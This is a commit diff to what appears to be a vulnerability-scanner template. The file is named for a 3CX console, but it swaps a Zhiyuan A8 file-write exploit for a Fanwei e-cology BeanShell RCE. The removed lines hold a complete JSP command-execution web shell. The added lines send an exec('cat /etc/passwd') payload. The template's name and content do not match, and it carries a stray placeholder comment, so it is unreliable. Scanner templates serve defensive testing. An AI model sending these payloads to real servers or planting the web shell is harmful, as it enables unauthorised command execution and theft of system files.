Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs

2022-05-06 16:10:15 -04:00 · 2022-05-06 16:10:15 -04:00 · 5cf7d44d12
parent 8917c7f5a7
commit 5cf7d44d12
1 changed files with 12 additions and 35 deletions
--- a/vulnerabilities/other/3cx-management-console.yaml
+++ b/vulnerabilities/other/3cx-management-console.yaml
@ -1,49 +1,26 @@
-id: CNVD-2019-19299
-# test
+id: CNVD-2019-32204
+# AAAAAAAA
 info:
-  name: Zhiyuan A8 Arbitrary File Write (RCE)
+  name: Fanwei e-cology <= 9.0 Remote Code Execution
  author: daffainfo
  severity: critical
+  description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
  reference:
-    - https://www.cxyzjd.com/article/guangying177/110177339
-    - https://github.com/sectestt/CNVD-2019-19299
-  tags: zhiyuan,cnvd,cnvd2019,rce
+    - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
+  tags: fanwei,cnvd,cnvd2019,rce

 requests:
  - raw:
      - |
-        POST /seeyon/htmlofficeservlet HTTP/1.1
+        POST /bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
-        Pragma: no-cache
-        Cache-Control: no-cache
-        Upgrade-Insecure-Requests: 1
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
-        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
-        Connection: close
+        Content-Type: application/x-www-form-urlencoded

-        DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
-        OPTION=S3WYOSWLBSGr
-        currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
-        = WUghPB3szB3Xwg66 the CREATEDATE
-        recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
-        originalFileId = wV66
-        originalCreateDate = wUghPB3szB3Xwg66
-        FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
-        needReadFile = yRWZdAS6
-        originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
-        <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
+        bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw

-      - |
-        GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
    matchers:
-      - type: dsl
-        dsl:
-          - 'status_code_2 == 200'
-          - 'contains(body_1, "htmoffice operate")'
-          - 'contains(body_2, "Windows IP")'
-        condition: and
+      - type: regex
+        regex:
+          - "root:.*:0:0:"

 # Enhanced by cs on 2022/05/06